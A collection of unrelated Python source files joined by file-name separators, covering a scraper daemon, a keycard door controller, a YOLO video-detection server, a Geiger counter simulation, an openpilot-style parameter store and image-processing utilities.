with zipfile.ZipFile(inmemory_zip, 'a', compression=zipfile.ZIP_DEFLATED) as zf:
zf.writestr(hashlib.md5(url.encode(
'utf-8')).hexdigest(), json.dumps(resp_json, ensure_ascii=False))
storage.blob("nicoapi/"+docRef.id + "/"+tsuid +
".zip").upload_from_string(inmemory_zip.getvalue())
except:
pass
recodes[tsuid]["status"] = "processed"
docRef.set(recodes, merge=True)
# prevent high freq restart
while int(datetime.now().timestamp()*1000) < start_timestamp+3000:
time.sleep(1)
thread_d = threading.Thread(name='nicoapi_d', target=deamon)
def show(request):
# head ← (template)
global access_counter
access_counter += 1
status_dict: dict = {
"access_counter": str(access_counter),
"Thread": "Running", }
# body
global thread_d
if thread_d.is_alive() == False:
thread_d = threading.Thread(name='nicoapi_d', target=deamon)
thread_d.start()
status_dict["thread"] = "start"
if request.method == "POST":
return json.dumps(status_dict, ensure_ascii=False), 200
# foot ← (template)
status_lines: str = "<h6 class='text-center'>==STATUS==</h6>"
for key, value in status_dict.items():
status_lines += "<div class='text-center' >" + key+": "+value+"</div>"
kwargs = {"STATUS_LINES": status_lines}
with open(os.path.join(os.path.dirname(__file__), "main.html"), "r", encoding="utf-8") as f:
html = f.read()
for kw, arg in kwargs.items():
html = html.replace("{{"+kw+"}}", arg)
return flask.render_template_string(html)
return "404: nof found → main.html", 404
|
__init__.py
|
import logging
import threading
import requests
import time
from .wiegand import Decoder
logging.basicConfig(level=logging.DEBUG)
class Main:
def __init__(self, api_user, api_key):
self.cards = {}
self.force_sync_now = threading.Event()
self.session = requests.Session()
self.session.auth = (api_user, api_key)
self.sync_cards()
logging.info("Running")
self.wiegand = Decoder(self.wiegand_callback)
self.notify_thread = threading.Thread(target=self.listen_notification, daemon=True)
self.notify_thread.start()
self.auto_sync_loop()
def sync_cards(self):
logging.info("Downloading users list")
r = self.session.get("http://127.0.0.1:8080/api/v1/cards")
users = r.json()["keycards"]
cards = {}
for user in users:
cards[user["card_uid"].strip()] = user
self.cards = cards
def wiegand_callback(self, bits, value):
print("bits", bits, "value", value)
u = self.cards.get(value)
if u:
print("user", u)
self.wiegand.open_door()
def listen_notification(self):
while 1:
try:
r = requests.get("https://wut.ee/notify/abc",
headers={"Connection": "close"},
timeout=60)
logging.debug("Got notification: %s", r.text)
self.force_sync_now.set()
except requests.Timeout as e:
logging.debug("notification timeout")
time.sleep(0.1)
def auto_sync_loop(self):
while 1:
try:
self.force_sync_now.wait(60*10) # == 10min
self.force_sync_now.clear()
self.sync_cards()
except KeyboardInterrupt as e:
self.wiegand.cancel()
break
|
darknet4.py
|
#!python3
'''
##############################
### Receive Video stream #####
### from Android client #######
### Use yolo to do detect ####
## (return a message to the mobile device) ##
##############################
'''
from ctypes import *
import math
import random
import os
import socket
import time
import cv2
import numpy as np
from PIL import Image
import sys
import pickle
import struct
import timeit
import time
import threading
import Queue
import ctypes
# generate different colors for different classes
COLORS = np.random.uniform(0, 255, size=(80,3))
def sample(probs):
s = sum(probs)
probs = [a/s for a in probs]
r = random.uniform(0, 1)
for i in range(len(probs)):
r = r - probs[i]
if r <= 0:
return i
return len(probs)-1
def c_array(ctype, values):
arr = (ctype*len(values))()
arr[:] = values
return arr
class BOX(Structure):
_fields_ = [("x", c_float),
("y", c_float),
("w", c_float),
("h", c_float)]
class DETECTION(Structure):
_fields_ = [("bbox", BOX),
("classes", c_int),
("prob", POINTER(c_float)),
("mask", POINTER(c_float)),
("objectness", c_float),
("sort_class", c_int)]
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
class METADATA(Structure):
_fields_ = [("classes", c_int),
("names", POINTER(c_char_p))]
lib = CDLL("/home/nano/darknet/libdarknet.so", RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)
set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]
make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)
make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]
free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]
network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]
reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p
do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]
free_image = lib.free_image
free_image.argtypes = [IMAGE]
letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE
load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA
load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE
rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE, c_int]
predict_image.restype = POINTER(c_float)
#def classify(net, meta, im):
# out = predict_image(net, im)
# res = []
# for i in range(meta.classes):
# res.append((meta.names[i], out[i]))
# res = sorted(res, key=lambda x: -x[1])
# return res
### modified ###
HOST=''
USER_PORT=9004
CTL_PORT=11114
BUFFER_SIZE = 256
QUATO = 100
Interval = 10
Latency = []
Count = 0
def connect_controller():
global QUATO
global Latency
ctl = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
ctl.bind((HOST, CTL_PORT))
ctl.listen(10)
print('Controller Socket now listening')
while True:
controller, ctl_addr = ctl.accept()
print("Get new controller socket" + str(ctl_addr))
while True:
recv_data = controller.recv(ctypes.sizeof(ctypes.c_double)*BUFFER_SIZE)
if len(recv_data) <=0:
break
Latency = []
data = np.fromstring(recv_data, dtype=np.double)
#print(data)
QUATO = int(data[0])
print('GPU virtual resource is ' + str(QUATO))
time.sleep(Interval)
if len(Latency) ==0:
Latency.append(1e-1)
send_data = np.mean(Latency[-5:]) * np.ones(BUFFER_SIZE, dtype=np.double)
controller.sendall(send_data)
def recImage(client,data,q):
frameid = 1
while True:
buf = ''
while len(buf)<4:
buf += client.recv(4-len(buf))
size, = struct.unpack('!i', buf)
#print "receiving %d bytes" % size
while len(data) < size:
data += client.recv(1024)
frame_data = data[:size]
data = data[size:]
imgdata = np.fromstring(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
#q.put(decimg)
#print "frame %d finish offloading" % frameid
#f2 = open('/home/nvidia/Desktop/haoxin/images/newNexus320/320off/datasize320.txt','a')
#print >> f2, "%f" %size
#f2.close()
#if frameid>= 45 and frameid<=50:
# cv2.imwrite("/home/nvidia/Desktop/haoxin/images/newNexus320/320off/image%2d.bmp" %frameid,decimg)
frameid += 1
def recv_image_from_socket(client, data):
buf = ''
while len(buf)<4:
buf += client.recv(4-len(buf))
size, = struct.unpack('!i', buf)
#print "receiving %d bytes" % size
while len(data) < size:
data += client.recv(1024)
frame_data = data[:size]
data = data[size:]
imgdata = np.fromstring(frame_data, dtype='uint8')
decimg = cv2.imdecode(imgdata,1)
return decimg
def detect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
global QUATO
#check if image is an OpenCV frame
if isinstance(image, np.ndarray):
#StartTime0 = time.time()
# GET C,H,W, and DATA values
#print ('1')
img = image.transpose(2, 0, 1)
c, h, w = img.shape[0], img.shape[1], img.shape[2]
nump_data = img.ravel() / 255.0
nump_data = np.ascontiguousarray(nump_data, dtype=np.float32)
# make c_type pointer to numpy array
ptr_data = nump_data.ctypes.data_as(POINTER(c_float))
# make IMAGE data type
im = IMAGE(w=w, h=h, c=c, data=ptr_data)
else:
im = load_image(image, 0, 0)
print ('2')
num = c_int(0)
pnum = pointer(num)
predict_image(net, im, QUATO)
dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
num = pnum[0]
if (nms): do_nms_obj(dets, num, meta.classes, nms);
res = []
for j in range(num):
for i in range(meta.classes):
if dets[j].prob[i] > 0:
b = dets[j].bbox
classid = i
calssnamess = meta.names[i].decode('UTF-8')
res.append((calssnamess, dets[j].prob[i], (b.x, b.y, b.w, b.h),classid))
res = sorted(res, key=lambda x: -x[1])
#free_image(im)
free_detections(dets, num)
return res
# display the pic after detecting
def showPicResult(r,im,frameID):
for i in range(len(r)):
x1=r[i][2][0]-r[i][2][2]/2
y1=r[i][2][1]-r[i][2][3]/2
x2=r[i][2][0]+r[i][2][2]/2
y2=r[i][2][1]+r[i][2][3]/2
color = COLORS[r[i][3]]
cv2.rectangle(im,(int(x1),int(y1)),(int(x2),int(y2)),color,2)
#putText
x3 = int(x1+5)
y3 = int(y1-10)
font = cv2.FONT_HERSHEY_SIMPLEX
text = "{}: {:.4f}".format(str(r[i][0]), float(r[i][1]))
if ((x3<=im.shape[0]) and (y3>=0)):
cv2.putText(im, text, (x3,y3), font, 0.5, color, 1,cv2.CV_AA)
else:
cv2.putText(im, text, (int(x1),int(y1+6)), font, 0.5, color, 1,cv2.CV_AA)
#if frameID>= 45 and frameID<=50:
# cv2.imwrite("/home/nvidia/Desktop/haoxin/images/newNexus320/320off/image%3d.bmp" %frameID,im)
cv2.imshow('Detection Window', im)
#cv2.waitKey(0)
#cv2.destroyAllWindows()
if __name__ == "__main__":
t1 = threading.Thread(target = connect_controller)
t1.setDaemon(True)
t1.start()
detect_net = load_net("./cfg/yolov3-608.cfg", "yolov3.weights", 0)
detect_meta = load_meta("cfg/coco.data")
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((HOST,USER_PORT))
s.listen(10)
client,addr=s.accept()
print ("Get new user socket")
data = b''
frameID = 1
starttime = time.time()
q = Queue.Queue()
#q = Queue.LifoQueue()
#t = threading.Thread(target = recImage,args=(client,data,q))
#t.setDaemon(True)
#t.start()
StartTime = time.time()
while True:
decimg = recv_image_from_socket(client,data)
compTime = time.time()
result = detect(detect_net, detect_meta, decimg, thresh=0.7)
#print('comp: ' + str(time.time() - compTime))
#print('real: ' + str(0.14 + 4.63/(QUATO+0.454)))
str1 = '0'+'\n'
client.sendall(str1.encode())
Latency.append(time.time() - StartTime)
print('round-trip latency is ' + str(time.time() - StartTime))
StartTime = time.time()
|
Geiger_Counter.py
|
"""
Contador Geiger-Müller
Luis Eduardo Sánchez González
Facultad de Ciencias Físico Matemáticas
Física Computacional
sáb 01 may 2021 10:12:14 CDT
Repositorio: https://github.com/Luis2501/Fisica-Computacional-1
"""
import numpy as np
from time import sleep
from random import random
from tkinter import *
import threading
import matplotlib.pyplot as plt
class UI(Frame):
def __init__(self, parent=None, N0=1000, t=100, p=0.01):
Frame.__init__(self, parent)
self.N0, self.t, self.p = N0, t, p
self.parent = parent
self.init_ui()
def init_ui(self):
self.parent.title("Geiger-Müller Counter")
self.N = StringVar()
self.N.set(self.N0)
self.parent.label = Label(font=("Verdana",24))
self.parent.label.pack(padx = 50, pady = 20)
self.parent.label.config(textvariable=self.N)
self.parent.iniciar = Button(text = "Iniciar", command = self.Decay)
self.parent.iniciar.pack(pady = 20)
self.hilo = threading.Thread(target=Decay)
def Decay(self):
N0, p, t = self.N0, self.p, self.t
for i in range(t - 1):
for k in range(N0):
if random() < p:
N0 -= 1
self.N.set(N0)
sleep(4)
self.Beep()
def Beep(self):
print("\a")
if __name__ == "__main__":
root = Tk()
app = UI(parent=root, N0=10000, t=100, p=0.01)
app.mainloop()
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarBatteryCapacity": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DisableUpdates": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LastUpdateException": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_NeosUpdate": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_UpdateFailed": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create, lock_ex):
self._path = path
self._create = create
self._fd = None
self._lock_ex = lock_ex
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX if self._lock_ex else fcntl.LOCK_SH)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create, lock_ex):
lock = FileLock(os.path.join(self._path, ".lock"), create, lock_ex)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False, False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True, True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True, True)
lock.acquire()
try:
tmp_path = tempfile.NamedTemporaryFile(mode="wb", prefix=".tmp", dir=params_path, delete=False)
with tmp_path as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
os.chmod(tmp_path.name, 0o666)
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path.name, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
|
util.py
|
import math
import cv2
import tensorflow as tf
import os
import sys
'''
output states:
0: has rewards?
1: stopped?
2: num steps
3:
'''
STATE_REWARD_DIM = 0
STATE_STOPPED_DIM = 1
STATE_STEP_DIM = 2
STATE_DROPOUT_BEGIN = 3
def get_expert_file_path(expert):
expert_path = 'data/artists/fk_%s/' % expert
return expert_path
# From github.com/OlavHN/fast-neural-style
def instance_norm(x):
epsilon = 1e-9
mean, var = tf.nn.moments(x, [1, 2], keep_dims=True)
return (x - mean) / tf.sqrt(var + epsilon)
def enrich_image_input(cfg, net, states):
if cfg.img_include_states:
print(("states for enriching", states.shape))
states = states[:, None, None, :] + (net[:, :, :, 0:1] * 0)
net = tf.concat([net, states], axis=3)
return net
# based on https://stackoverflow.com/questions/2352181/how-to-use-a-dot-to-access-members-of-dictionary
class Dict(dict):
"""
Example:
m = Dict({'first_name': 'Eduardo'}, last_name='Pool', age=24, sports=['Soccer'])
"""
def __init__(self, *args, **kwargs):
super(Dict, self).__init__(*args, **kwargs)
for arg in args:
if isinstance(arg, dict):
for k, v in arg.items():
self[k] = v
if kwargs:
for k, v in kwargs.items():
self[k] = v
def __getattr__(self, attr):
return self[attr]
def __setattr__(self, key, value):
self.__setitem__(key, value)
def __setitem__(self, key, value):
super(Dict, self).__setitem__(key, value)
self.__dict__.update({key: value})
def __delattr__(self, item):
self.__delitem__(item)
def __delitem__(self, key):
super(Dict, self).__delitem__(key)
del self.__dict__[key]
def make_image_grid(images, per_row=8, padding=2):
npad = ((0, 0), (padding, padding), (padding, padding), (0, 0))
images = np.pad(images, pad_width=npad, mode='constant', constant_values=1.0)
assert images.shape[0] % per_row == 0
num_rows = images.shape[0] // per_row
image_rows = []
for i in range(num_rows):
image_rows.append(np.hstack(images[i * per_row:(i + 1) * per_row]))
return np.vstack(image_rows)
def get_image_center(image):
if image.shape[0] > image.shape[1]:
start = (image.shape[0] - image.shape[1]) // 2
image = image[start:start + image.shape[1], :]
if image.shape[1] > image.shape[0]:
start = (image.shape[1] - image.shape[0]) // 2
image = image[:, start:start + image.shape[0]]
return image
def rotate_image(image, angle):
"""
Rotates an OpenCV 2 / NumPy image about it's centre by the given angle
(in degrees). The returned image will be large enough to hold the entire
new image, with a black background
"""
# Get the image size
# No that's not an error - NumPy stores image matricies backwards
image_size = (image.shape[1], image.shape[0])
image_center = tuple(np.array(image_size) // 2)
# Convert the OpenCV 3x2 rotation matrix to 3x3
rot_mat = np.vstack(
[cv2.getRotationMatrix2D(image_center, angle, 1.0), [0, 0, 1]])
rot_mat_notranslate = np.matrix(rot_mat[0:2, 0:2])
# Shorthand for below calcs
image_w2 = image_size[0] * 0.5
image_h2 = image_size[1] * 0.5
# Obtain the rotated coordinates of the image corners
rotated_coords = [
(np.array([-image_w2, image_h2]) * rot_mat_notranslate).A[0],
(np.array([image_w2, image_h2]) * rot_mat_notranslate).A[0],
(np.array([-image_w2, -image_h2]) * rot_mat_notranslate).A[0],
(np.array([image_w2, -image_h2]) * rot_mat_notranslate).A[0]
]
# Find the size of the new image
x_coords = [pt[0] for pt in rotated_coords]
x_pos = [x for x in x_coords if x > 0]
x_neg = [x for x in x_coords if x < 0]
y_coords = [pt[1] for pt in rotated_coords]
y_pos = [y for y in y_coords if y > 0]
y_neg = [y for y in y_coords if y < 0]
right_bound = max(x_pos)
left_bound = min(x_neg)
top_bound = max(y_pos)
bot_bound = min(y_neg)
new_w = int(abs(right_bound - left_bound))
new_h = int(abs(top_bound - bot_bound))
# We require a translation matrix to keep the image centred
trans_mat = np.matrix([[1, 0, int(new_w * 0.5 - image_w2)],
[0, 1, int(new_h * 0.5 - image_h2)], [0, 0, 1]])
# Compute the tranform for the combined rotation and translation
affine_mat = (np.matrix(trans_mat) * np.matrix(rot_mat))[0:2, :]
# Apply the transform
result = cv2.warpAffine(
image, affine_mat, (new_w, new_h), flags=cv2.INTER_LINEAR)
return result
def largest_rotated_rect(w, h, angle):
"""
Given a rectangle of size wxh that has been rotated by 'angle' (in
radians), computes the width and height of the largest possible
axis-aligned rectangle within the rotated rectangle.
Original JS code by 'Andri' and Magnus Hoff from Stack Overflow
Converted to Python by Aaron Snoswell
"""
quadrant = int(math.floor(angle / (math.pi / 2))) & 3
sign_alpha = angle if ((quadrant & 1) == 0) else math.pi - angle
alpha = (sign_alpha % math.pi + math.pi) % math.pi
bb_w = w * math.cos(alpha) + h * math.sin(alpha)
bb_h = w * math.sin(alpha) + h * math.cos(alpha)
gamma = math.atan2(bb_w, bb_w) if (w < h) else math.atan2(bb_w, bb_w)
delta = math.pi - alpha - gamma
length = h if (w < h) else w
d = length * math.cos(alpha)
a = d * math.sin(alpha) / math.sin(delta)
y = a * math.cos(gamma)
x = y * math.tan(gamma)
return (bb_w - 2 * x, bb_h - 2 * y)
def crop_around_center(image, width, height):
"""
Given a NumPy / OpenCV 2 image, crops it to the given width and height,
around it's centre point
"""
image_size = (image.shape[1], image.shape[0])
image_center = (int(image_size[0] * 0.5), int(image_size[1] * 0.5))
if (width > image_size[0]):
width = image_size[0]
if (height > image_size[1]):
height = image_size[1]
x1 = int(image_center[0] - width * 0.5)
x2 = int(image_center[0] + width * 0.5)
y1 = int(image_center[1] - height * 0.5)
y2 = int(image_center[1] + height * 0.5)
return image[y1:y2, x1:x2]
# angle: degrees
def rotate_and_crop(image, angle):
image_width, image_height = image.shape[:2]
image_rotated = rotate_image(image, angle)
image_rotated_cropped = crop_around_center(image_rotated,
*largest_rotated_rect(
image_width, image_height,
math.radians(angle)))
return image_rotated_cropped
def lrelu(x, leak=0.2, name="lrelu"):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# clamps to 0, 1 with leak
def double_lrelu(x, leak=0.1, name="double_lrelu"):
with tf.variable_scope(name):
return tf.minimum(tf.maximum(leak * x, x), leak * x - (leak - 1))
# clamp to lower, upper; leak is RELATIVE
def leaky_clamp(x, lower, upper, leak=0.1, name="leaky_clamp"):
with tf.variable_scope(name):
x = (x - lower) / (upper - lower)
return tf.minimum(tf.maximum(leak * x, x), leak * x -
(leak - 1)) * (upper - lower) + lower
class Tee(object):
def __init__(self, name):
self.file = open(name, 'w')
self.stdout = sys.stdout
self.stderr = sys.stderr
sys.stdout = self
sys.stderr = self
def __del__(self):
self.file.close()
def write(self, data):
self.file.write(data)
self.stdout.write(data)
self.file.flush()
self.stdout.flush()
def write_to_file(self, data):
self.file.write(data)
def flush(self):
self.file.flush()
def rgb2lum(image):
image = 0.27 * image[:, :, :, 0] + 0.67 * image[:, :, :,
1] + 0.06 * image[:, :, :, 2]
return image[:, :, :, None]
def tanh01(x):
return tf.tanh(x) * 0.5 + 0.5
def tanh_range(l, r, initial=None):
def get_activation(left, right, initial):
def activation(x):
if initial is not None:
bias = math.atanh(2 * (initial - left) / (right - left) - 1)
else:
bias = 0
return tanh01(x + bias) * (right - left) + left
return activation
return get_activation(l, r, initial)
def merge_dict(a, b):
ret = a.copy()
for key, val in list(b.items()):
if key in ret:
assert False, 'Item ' + key + 'already exists'
else:
ret[key] = val
return ret
def lerp(a, b, l):
